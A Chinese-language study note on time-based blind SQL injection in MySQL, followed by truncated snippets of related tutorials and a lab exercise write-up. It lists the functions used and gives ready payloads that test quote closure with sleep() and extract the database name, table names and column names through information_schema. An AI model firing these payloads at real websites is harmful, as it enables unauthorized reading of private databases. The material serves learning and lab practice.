時間型的注入遇到的條件更為苛刻,資料互動完成以後目標**沒有錯誤和正確的頁面回顯,這種情況我們可以利用時間函式來判斷資料有沒有在目標資料中得到執行。當然也需要構造閉合。
函式:
lenght() //長度
ascii() //ascii碼
mid() //擷取字串
substr() //擷取字串
hex() //以上在布林型中介紹過
sleep() //時間注入的核心函式
sleep(1) //過1秒響應
if()函式
if(1=1,3,4) 返回 3
if(1=2,3,4) 返回4
構造判斷語句:
id=1' and if(1=2,1,sleep(2))
id=1" and if(1=2,1,sleep(2))
id=1) and if(1=2,1,sleep(2))
注:若時間執行時間為2s以後,則判斷正確。
構造爆庫語句:
?id=1' and if(length(database())>1,sleep(2),1) --+ //猜資料庫名稱長度
?id=1' and if(ord(mid(database(),1,1))>1,sleep(2),1) --+ //猜資料庫名稱
?id=1' and if(ord(mid((select table_name from information_schema.tables where table_schema='資料庫名' limit 0,1) ,1,1))>1,sleep(2),0) --+?id=1' and if(ord(mid((select column_name from information_schema.columns where table_schema='資料庫名' and table_name='表名' limit 0,1) ,1,1))>1,sleep(2),0) --+SQL注入學習筆記之SQL盲注
一 sql盲注的場景 1.提交乙個會觸發sql語句錯誤時,會返回乙個通用的錯誤頁面,而提交正確的sql時則返回乙個內容可被適度控制的頁面。2.提交乙個會觸發sql語句錯誤時,會返回乙個通用的錯誤頁面,提交正確的sql語句時,則會返回乙個內容不可控的頁面。3.提交受損或不正確的sql既不會產生錯誤頁面...
SQL注入基礎 4 時間盲注
時間盲注 利用sleep 或benchmark 等函式讓mysql執行時間變長經常與if expr1,expr2,expr3 語句結合使用,通過頁面的響應時間來判斷條件是否正確。if expr1,expr2,expr3 含義是如果expr1是true,則返回expr2,否則返回expr3。1 考慮使...
SQL注入實驗 web靶機第九關(時間型盲注)
時間型的注入遇到的條件更為苛刻,資料互動完成以後目標 沒有錯誤和正確的頁面回顯,這種情況我們可以利用時間函式來判斷資料有沒有在目標資料中得到執行。當然也需要構造閉合。and if 1 2,1,sleep 4 利用時間函式,通過檢視網頁返回的時間判斷時間函式誰否執行來判斷自己的閉合是否正確 and i...